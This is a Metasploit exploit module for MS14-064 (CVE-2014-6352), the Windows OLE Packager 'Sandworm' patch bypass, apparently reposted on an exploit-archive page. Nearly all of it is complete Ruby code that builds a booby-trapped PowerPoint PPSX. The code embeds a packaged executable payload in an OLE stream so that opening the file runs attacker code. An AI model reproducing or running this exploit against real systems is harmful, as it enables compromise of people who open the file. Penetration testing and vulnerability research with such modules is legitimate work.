MS14-064 Microsoft Windows OLE Package Manager Code Execution

2014-11-14 21:05:03

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
crash due to a failure in the CPackage::CreateTempFileName function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Haifei Li', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-6352'],
['MSB', 'MS14-064'],
['BID', '70690'],
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 21 2014",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
], self.class)
end

def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ole_stream = ole_packager
zip = zip_ppsx(ole_stream)
file_create(zip)
end

def zip_ppsx(ole_stream)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')

Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end

# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)

# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream

# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end

ppsx.pack
end

def ole_packager
payload_name = "#{rand_text_alpha(4)}.exe"

file_info = [2].pack('v')
file_info << "#{payload_name}\x00"
file_info << "#{payload_name}\x00"
file_info << "\x00\x00"

extract_info = [3].pack('v')
extract_info << [payload_name.length + 1].pack('V')
extract_info << "#{payload_name}\x00"

p = generate_payload_exe
file = [p.length].pack('V')
file << p

append_info = [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)

ole_data = file_info + extract_info + file + append_info
ole_contents = [ole_data.length].pack('V') + ole_data

ole = create_ole("\x01OLE10Native", ole_contents)

ole
end

def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)

stm = stg.create_stream(stream_name)
stm << data
stm.close

directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 0003000C-0000-0000-c000-000000000046 # Packager
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end

# write to disk
stg.close

ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink

ole_contents
end
end

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.